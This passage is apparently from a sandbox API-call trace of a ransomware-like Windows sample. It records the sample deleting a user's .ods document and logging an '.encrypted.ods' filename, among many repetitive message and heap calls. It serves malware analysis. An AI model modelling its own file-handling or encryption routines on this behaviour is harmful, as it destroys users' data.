hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0033.195] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\izle.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0033.195] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.195] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.196] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.196] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0033.196] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.196] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.196] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.196] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.196] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.196] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.196] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.196] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0033.196] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.196] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.196] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.196] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.197] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.197] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.197] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods", lpFilePart=0x0) returned 0x30 [0033.197] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x801ce180, ftCreationTime.dwHighDateTime=0x1d5b646, ftLastAccessTime.dwLowDateTime=0x37ff5ba0, ftLastAccessTime.dwHighDateTime=0x1d5c3fa, ftLastWriteTime.dwLowDateTime=0x13abaca0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x8860, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="iZLE.ods", cAlternateFileName="")) returned 0x7c2240 [0033.197] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\izle.ods")) returned 1 [0033.198] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x801ce180, ftCreationTime.dwHighDateTime=0x1d5b646, ftLastAccessTime.dwLowDateTime=0x37ff5ba0, ftLastAccessTime.dwHighDateTime=0x1d5c3fa, ftLastWriteTime.dwLowDateTime=0x13abaca0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x8860, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="iZLE.ods", cAlternateFileName="")) returned 0 [0033.198] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.198] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.198] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.199] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.199] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.199] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.199] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.199] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0033.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.200] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.200] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.200] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.200] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.200] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.200] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.200] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.200] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0xf28, lpOverlapped=0x0) returned 1 [0033.200] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.200] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0xf28, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.201] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0033.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.encrypted.ods\r\n", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0033.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d) returned 0x7ab338 [0033.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.encrypted.ods\r\n", cchWideChar=61, lpMultiByteStr=0x7ab338, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iZLE.encrypted.ods\r\n", lpUsedDefaultChar=0x0) returned 61 [0033.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.201] WriteFile (in: hFile=0x128, lpBuffer=0x7ab380*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab380*, lpNumberOfBytesWritten=0x6aee3c*=0x3c, lpOverlapped=0x0) returned 1 [0033.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.201] CloseHandle (hObject=0x128) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.202] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0033.202] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.205] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.205] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.205] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0033.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0033.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.205] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0033.206] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 